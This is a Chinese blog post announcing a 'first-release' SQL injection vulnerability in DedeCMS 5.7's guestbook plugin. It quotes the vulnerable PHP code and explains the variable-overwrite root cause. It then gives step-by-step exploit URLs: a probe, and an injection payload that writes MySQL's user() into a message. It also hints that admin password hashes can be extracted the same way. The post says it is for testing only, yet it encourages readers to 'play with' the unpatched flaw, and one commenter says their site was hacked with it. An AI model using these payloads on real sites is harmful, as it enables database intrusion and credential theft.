?

Dec 26 2012

(首發)dedecms 5.7 最新漏洞(絕非網上公布的)

首頁 » 代碼審計 » (首發)dedecms 5.7 最新漏洞(絕非網上公布的)   

請看看文件:include/filter.inc.php

引用一哥話語:

這是2B的dede再次變量覆蓋漏洞根源。。

這是過濾或替換非法關鍵字。正常的。

/* 對_GET,_POST,_COOKIE進行過濾 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}

等同于重新賦值了,之前做的過濾無效了。
這是過濾或替換非法關鍵字。正常的。


1.為了有效的防止 傳播 轉載 公布
2.一些首發漏洞就得設置點權限 自然以后大家都想著升官 這樣才能看到更好的貼 自然想升官就得自己先發好貼 這樣一來 自然好貼就多了。
不知道有沒有道理,反正我是這樣覺得的。當然過段時間 會設置成0權限查看。一開始嘛 先讓一些發過好貼升官的人看嘛,就象wooyun 先核心看 再普通 在初級的 這樣我覺得是更好些 !


漏洞:dedecms 5.7 最新sql漏洞一枚
作者:鬼哥
版權:www.90sec.org

看此貼你需要保證以下幾點:
                                        1.保證需要人品好
                                        2.保證不非法利用(只漏洞檢測修復 不干壞事)[否則后果自負]
                                        3.絕對保證100%不傳播 公開 轉載 (如發現:傳播 轉載 公布)我只能說我會很傷心! 沒公開的漏洞能玩就先玩段時間嘛!
                                        4.尊重版權!



漏洞文件edit.inc.php具體代碼:<?php

if(!defined('DEDEINC')) exit('Request Error!');

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";

$id = intval($id);
if(empty($job)) $job='view';

if($job=='del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("成功刪除一條留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("成功審核一條留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='editok')
{
    $remsg = trim($remsg);
    if($remsg!='')
    {
        //管理員回復不過濾HTML
        if($g_isadmin)
        {
            $msg = "<div class=\\'rebox\\'>".$msg."</div>\n".$remsg;
            //$remsg <br><font color=red>管理員回復:</font>
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\\'rebox\\'>".addslashes($row['msg'])."</div>\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
   //這里沒有對$msg過濾,導致可以任意注入了
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回復一條留言!", $GUEST_BOOK_POS);
    exit();
}

if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}


漏洞成功需要條件:
                          1. php magic_quotes_gpc=off
                          2.漏洞文件存在 plus/guestbook.php dede_guestbook 表當然也要存在。

怎么判斷是否存在漏洞:
                                先打開www.xxx.com/plus/guestbook.php  可以看到別人的留言,
                                然后鼠標放在 [回復/編輯]   上 可以看到別人留言的ID。那么記下ID
                                訪問:www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=存在的留言ID
                                提交后如果是dede5.7版本的話 會出現 “成功更改或回復一條留言” 那就證明修改成功了
                               跳回到www.xxx.com/plus/guestbook.php 看下你改的那條留言ID是否變成了 90sec' 如果變成了 那么證明漏洞無法利用應為他開啟了 php magic_quotes_gpc=off
                               如果沒有修改成功,那留言ID的內容還是以前的 那就證明漏洞可以利用。
                               那么再次訪問 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
                               然后返回,那條留言ID的內容就直接修改成了mysql 的user().

大概利用就是這樣,大家有興趣的多研究下!!

最后補充下,估計有人會說怎么暴管理后臺帳戶密碼,你自己研究下 會知道的。反正絕對可以暴出來(不可以暴出來我就不會發)!!
正文部分到此結束

文章標簽: dedecms 5.7 dede漏洞 織夢漏洞

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «ECShop V2.7.3 GBK release1106注入0day | emblog 編輯器xss 跨死你無壓力»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

已有9條評論

匿名

2016-10-14 17:17 4樓
第一次提交不了,第二次依舊無法修改

mOon

2016-10-19 09:06
@匿名:修補了

匿名

2015-07-13 14:01 地板
暈了~~我的網站就被這個漏洞搞了~~~

mOon

2015-07-16 18:27
@匿名:額

匿名

2015-11-08 20:23
@mOon:我今天看的一個站,過程跟你是一樣的,但是沒結果。。。。

匿名

2014-12-07 14:32 板凳
研究不來,麻煩說下唄

匿名

2014-08-08 00:04 沙發
傻逼

匿名

2014-12-10 17:19
@匿名:沒安裝留言板怎么弄

mOon

2014-12-12 18:49
@匿名:沒得弄
?
?
河北11选5开奖